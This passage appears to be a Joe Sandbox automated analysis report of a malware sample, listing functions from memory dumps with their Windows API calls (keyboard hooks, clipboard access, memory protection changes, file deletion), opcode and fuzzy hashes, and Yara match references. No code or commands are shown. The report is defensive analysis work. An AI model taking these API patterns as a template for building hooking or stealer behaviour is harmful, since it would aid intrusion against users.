                                                                                              • Instruction ID: 4907449664c7050fbf875ad56563b8f3d244933af39552ad6c1f59c3342bbb66
                                                                                              • Opcode Fuzzy Hash: 9fd00cf4669e5a62901a32fc4707d19b35ecb56ffd9bb919f5caf9e88da555c5
                                                                                              • Instruction Fuzzy Hash: 585147B09007498FDB04DFA9D688BDEBBF1AB88310F208569D419A73A0D7789980CF65
                                                                                              Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 0040AF80
                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1411284514-0
                                                                                              • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                              • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                              Function 2AB1AD90 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2041127198.000000002AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AB10000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2ab10000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5755a27f0cbfea9f4ca205cbd6b8c9c3cfcc4bb4ca8234e63447f1a2917c6d75
                                                                                              • Instruction ID: e380a79efc5c180d291a09bb32ee4850473cab8dafabf28a513f830f55e40af3
                                                                                              • Opcode Fuzzy Hash: 5755a27f0cbfea9f4ca205cbd6b8c9c3cfcc4bb4ca8234e63447f1a2917c6d75
                                                                                              • Instruction Fuzzy Hash: 9F414831D043958FCB01DF79D4946DEBFF1AF8A310F1486AAD444E7291DB389845CBA1
                                                                                              Function 2AB1AF40 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 2AB1AEDF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2041127198.000000002AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AB10000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2ab10000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: eaa1bfab2b1bd5e723416e3744a7875c32bb967ad26355cbcec62f7f14b6a1b5
                                                                                              • Instruction ID: e2bca44f647ea09ce0fbd4e5bf39527ebb02e519f1b0b2d8d4f0b7b83fb9b723
                                                                                              • Opcode Fuzzy Hash: eaa1bfab2b1bd5e723416e3744a7875c32bb967ad26355cbcec62f7f14b6a1b5
                                                                                              • Instruction Fuzzy Hash: D851BD31600205CFC704EF29D488A9ABBF2EF89314F1185A9E405EB371DB34EC84DBA0
                                                                                              Function 2AFE1A86 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2AFE1BA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 011fa03c1e21589daf2a9783d970412af9daa6890a1c913a2997754b8e496a54
                                                                                              • Instruction ID: 327c49ec9890f5c5a27798d3b88aaafff225e9667d33723ab318e688da3948d6
                                                                                              • Opcode Fuzzy Hash: 011fa03c1e21589daf2a9783d970412af9daa6890a1c913a2997754b8e496a54
                                                                                              • Instruction Fuzzy Hash: F251D3B1D00349DFDB14CFAAD994ADEBFB6BF48314F24822AE818AB210D7759845CF54
                                                                                              Function 2AFE1A90 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2AFE1BA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 5123aa86ff3f7fd7ee1784a49873574845f4d8cb5028e6b73dd7d8d2e906f89b
                                                                                              • Instruction ID: c45e737e0cae1645e3fd96b89970c6043537ee90ae44433fd8c494769410d187
                                                                                              • Opcode Fuzzy Hash: 5123aa86ff3f7fd7ee1784a49873574845f4d8cb5028e6b73dd7d8d2e906f89b
                                                                                              • Instruction Fuzzy Hash: B241C2B1D003099FDB14DF9AC984ADEBBB6BF48354F20822AE818AB210D7749845CF94
                                                                                              Function 2AFE555C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 2AFE68E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: 7f861be4e2394756e8ba3fa21e62092bb6c5ee81e993c139adc8d971a1a694f5
                                                                                              • Instruction ID: aa01d4afecda11b4fdf00e8133f0b550c94bcf7221b727c95ef303f293be8b5f
                                                                                              • Opcode Fuzzy Hash: 7f861be4e2394756e8ba3fa21e62092bb6c5ee81e993c139adc8d971a1a694f5
                                                                                              • Instruction Fuzzy Hash: 5A4149B5900349DFCB44DF99C988A9ABBF5FF88314F24C459D518AB321D778A941CFA0
                                                                                              Function 2AFE7565 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: 0a277b3f5c2f5d5b4164a0809c96bf30dfc77440d4010f65d4858b6875d37747
                                                                                              • Instruction ID: 22478e834c80875d638b4590b147bf36bd3d5b6f4f72c7c18fa74e42a273b537
                                                                                              • Opcode Fuzzy Hash: 0a277b3f5c2f5d5b4164a0809c96bf30dfc77440d4010f65d4858b6875d37747
                                                                                              • Instruction Fuzzy Hash: 903105B0D01348EFDB14DF99CA94BCEBBF5AF48314F208069E508AB254D7746945CF55
                                                                                              Function 2AFE7570 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: f5f4fb0291ab004a3139e27be87dc02cc1f1530727dd47bb5c627ac4296945b1
                                                                                              • Instruction ID: df843c81951e9dc0345c8b20f8bdc952bc69e3f25ae2128782b90ac720d7e196
                                                                                              • Opcode Fuzzy Hash: f5f4fb0291ab004a3139e27be87dc02cc1f1530727dd47bb5c627ac4296945b1
                                                                                              • Instruction Fuzzy Hash: 2431F1B0D01348EFDB14DF99CA94BCEBBF5AF48314F208069E508AB294DB786945CF95
                                                                                              Function 2AFE5990 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2AFE5A1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: ba403e6cfbf3d82431fab521b7c9e9fae89d2c52f6575a0cb70faa6d43359024
                                                                                              • Instruction ID: e92caf769b5b5732fdcc98b364697b25943a76693929afbcf1a892c5cf234d0d
                                                                                              • Opcode Fuzzy Hash: ba403e6cfbf3d82431fab521b7c9e9fae89d2c52f6575a0cb70faa6d43359024
                                                                                              • Instruction Fuzzy Hash: 0E2116B5900258DFDB10CFA9D984ADEBFF8EF48310F14815AE958A7310C378A940CF65
                                                                                              Function 2AFE5998 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2AFE5A1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: aa858ae446b3f2dbaa38bac1c8e1b834b55b7b6a47dd44f7f7ed62fd8e99b6bf
                                                                                              • Instruction ID: a8e240910bfa57f84a590517a284a8dcdc26a3e60ae8139d442e64e93856bb1b
                                                                                              • Opcode Fuzzy Hash: aa858ae446b3f2dbaa38bac1c8e1b834b55b7b6a47dd44f7f7ed62fd8e99b6bf
                                                                                              • Instruction Fuzzy Hash: FC21F5B59003089FDB10CF9AD584ADEFFF4EB48320F10801AE918A3310D378A950CFA4
                                                                                              Function 2AFE8F59 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 2AFE8FDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: 51c99f5dea51766071cfb98a0e7c6b197a98b1bceb39afb56c6e104bec0f800b
                                                                                              • Instruction ID: 57e922f8c06780dc955385b5886112350b4ea820897cbd8d7cccb06a8d3d2702
                                                                                              • Opcode Fuzzy Hash: 51c99f5dea51766071cfb98a0e7c6b197a98b1bceb39afb56c6e104bec0f800b
                                                                                              • Instruction Fuzzy Hash: C42138B1D002499FCB04DF99D944BEEFBF5EF88320F108429E559A7250C778A940CFA5
                                                                                              Function 2A492629 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 2A4926A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2040730858.000000002A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2a490000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: b6398ff36d4b5e312d9c60f17d25edd3fdd01a0fbdc29552984ce83bf6f07a75
                                                                                              • Instruction ID: 7d97795a51332b5c37eaf1d4adb596c31434f956b4bed6220fd088160d8ef779
                                                                                              • Opcode Fuzzy Hash: b6398ff36d4b5e312d9c60f17d25edd3fdd01a0fbdc29552984ce83bf6f07a75
                                                                                              • Instruction Fuzzy Hash: EF2124B1C0065A9FCB14DFAAD5447EEFFF0AF48320F11816AD858A7650D738A950CFA4
                                                                                              Function 2AFE8F60 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 2AFE8FDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: f6e2ea979c0aef89e9b9c0ea10a725108ef7daf8f975061130be4aa2248af9c6
                                                                                              • Instruction ID: 043d4f79e18e402c4a4fbd7090077586d50e4671e4a64d68514fd07d0c8cd1e9
                                                                                              • Opcode Fuzzy Hash: f6e2ea979c0aef89e9b9c0ea10a725108ef7daf8f975061130be4aa2248af9c6
                                                                                              • Instruction Fuzzy Hash: 6B2136B1D002499FCB04DF9AD944BEEFBF5EF88320F10842AE459A7250C778A940CFA5
                                                                                              Function 24F193F0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 24F19464
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2036287383.0000000024F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 24F10000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24f10000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: ddd62ec90c4838b84d1bdf5f9ad0793f49b26070bdc6aade9e84b8bfe2cdc078
                                                                                              • Instruction ID: 891bb9dff18b0b3a728b6110cfb3743b258bcf26de5a8efc4b1c10ed7f2e96c3
                                                                                              • Opcode Fuzzy Hash: ddd62ec90c4838b84d1bdf5f9ad0793f49b26070bdc6aade9e84b8bfe2cdc078
                                                                                              • Instruction Fuzzy Hash: 6C11F4B19002499FDB10DFAAC580AEEFBF5EF88320F10842AD459A7250C774A945CFA5
                                                                                              Function 2A492630 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 2A4926A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2040730858.000000002A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2a490000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 055a9683a86d48371b4e9cc45f9e94f0b2e9615a04402d5baf58787d18092acb
                                                                                              • Instruction ID: 9d315b0d48fef97a78ebc4242e10ea7e2b7b04f6e77a787facea40876e219218
                                                                                              • Opcode Fuzzy Hash: 055a9683a86d48371b4e9cc45f9e94f0b2e9615a04402d5baf58787d18092acb
                                                                                              • Instruction Fuzzy Hash: 941133B1C0065A9FCB10DF9AD540BAEFFF4BF48320F11816AD858A7650D738A950CFA5
                                                                                              Function 2AB1AE78 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 2AB1AEDF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2041127198.000000002AB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AB10000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2ab10000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: 7fc2d0bd080092e5bfe31aeb4470892877114663c06cfc83ca2e03a7f6d5b61a
                                                                                              • Instruction ID: 1ba939ad1fab856ad7c7400abc1c6c175cbd90113d8128825287c9ce43f849c3
                                                                                              • Opcode Fuzzy Hash: 7fc2d0bd080092e5bfe31aeb4470892877114663c06cfc83ca2e03a7f6d5b61a
                                                                                              • Instruction Fuzzy Hash: BA11F3B2C006599FCB10DF9AC544BDEFBF4EF48320F15816AD818A7250D778A940CFA5
                                                                                              Function 2AFE0F5A Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 2AFE0FC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 0a59aad8cb3a48aee0d0e5ab0dc244a32fcc39d5a498bebe1ce786c4a44174bf
                                                                                              • Instruction ID: 49af3958e91e4b8a4f5aab985b4ea2ebdfcd5079458d71a1e3f340f78b83e631
                                                                                              • Opcode Fuzzy Hash: 0a59aad8cb3a48aee0d0e5ab0dc244a32fcc39d5a498bebe1ce786c4a44174bf
                                                                                              • Instruction Fuzzy Hash: B31132B5C002898FCB10DFAAD544AEEFBF4EF88314F10856AD869B7610C379A545CFA1
                                                                                              Function 2AFE6B58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,2AFE6B35), ref: 2AFE6BBF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: 117070fbd09d4c9ce3a4e0572165a99fcb5fa85c0ef6b3a73f50a413e9e4e39f
                                                                                              • Instruction ID: 6a4e0867c7af9d62e9e946910eba720e119ccc5f68ebb66e5b406429a56b086a
                                                                                              • Opcode Fuzzy Hash: 117070fbd09d4c9ce3a4e0572165a99fcb5fa85c0ef6b3a73f50a413e9e4e39f
                                                                                              • Instruction Fuzzy Hash: 961136B1800248CFCB10DFA9D584BEEFFF4EB48324F20855AD419A7250C7786544CFA4
                                                                                              Function 2AFE55B4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,2AFE6B35), ref: 2AFE6BBF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2044111260.000000002AFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2AFE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2afe0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: c7b2fedd2f96751c9424f7083968bc291f33cf87bfcbaea576eb230ac5572cea
                                                                                              • Instruction ID: 6def571b6d0ee47b0c2d50d4db879bc3967df30edf8f608f0262c09cbff01286
                                                                                              • Opcode Fuzzy Hash: c7b2fedd2f96751c9424f7083968bc291f33cf87bfcbaea576eb230ac5572cea
                                                                                              • Instruction Fuzzy Hash: 5C1145B5800348CFCB10DF9AD984BDEFBF4EB48320F208469D918A7210C378A940CFA9
                                                                                              Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                              • SysAllocString.OLEAUT32 ref: 00401898
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocString_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 959018026-0
                                                                                              • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                              • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                              • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                              • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                              Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 0000000B.00000001.1826572703.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 10892065-0
                                                                                              • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                              • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                              • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                              • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                              Function 2B1E4010 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,r+
                                                                                              • API String ID: 0-3397804654
                                                                                              • Opcode ID: cc0a7b8fdac78d38d8857b802ee542ec2db7270f0e3042296d5acb39f245aaf1
                                                                                              • Instruction ID: 141535049eab6bdd1aad35eb0b5a818e3ae15cfaa2bc701695ac790236ae5764
                                                                                              • Opcode Fuzzy Hash: cc0a7b8fdac78d38d8857b802ee542ec2db7270f0e3042296d5acb39f245aaf1
                                                                                              • Instruction Fuzzy Hash: 4F615B31E007198FDF05DFA9D891ADEBBB6AF89310F044529D50AAB355DB34AA41CFA0
                                                                                              Function 24F195C8 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2036287383.0000000024F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 24F10000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_24f10000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: d8faba275d32db6a596ca26b83c2046a3e117cbf6d654ed15494648b82964516
                                                                                              • Instruction ID: 1c858f2d259a5047974d569fe41163068c9a7517cbd4bf5f3e5f5acb3607f3d4
                                                                                              • Opcode Fuzzy Hash: d8faba275d32db6a596ca26b83c2046a3e117cbf6d654ed15494648b82964516
                                                                                              • Instruction Fuzzy Hash: 18113AB1D002488FCB10DFAAC5457EEFBF5EF88324F208419D559A7250C778A944CFA5
                                                                                              Function 2B1E0448 Relevance: .2, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5278c9f28b2a4bde86dd27962d3dac3377f4b7b85eee2fa0a00a0c45009ea041
                                                                                              • Instruction ID: 7a068d510a6920af7060050d0fa410f4157183d5e81ac0fffd95f4edf5b6d612
                                                                                              • Opcode Fuzzy Hash: 5278c9f28b2a4bde86dd27962d3dac3377f4b7b85eee2fa0a00a0c45009ea041
                                                                                              • Instruction Fuzzy Hash: 62617A30600B019FDB64DF39C59675AB7E6FF88240B004A2DD88AC7B55EB75EA45CBA0
                                                                                              Function 2B1E4E20 Relevance: .1, Instructions: 124COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2047055184.000000002B1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B1E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_2b1e0000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
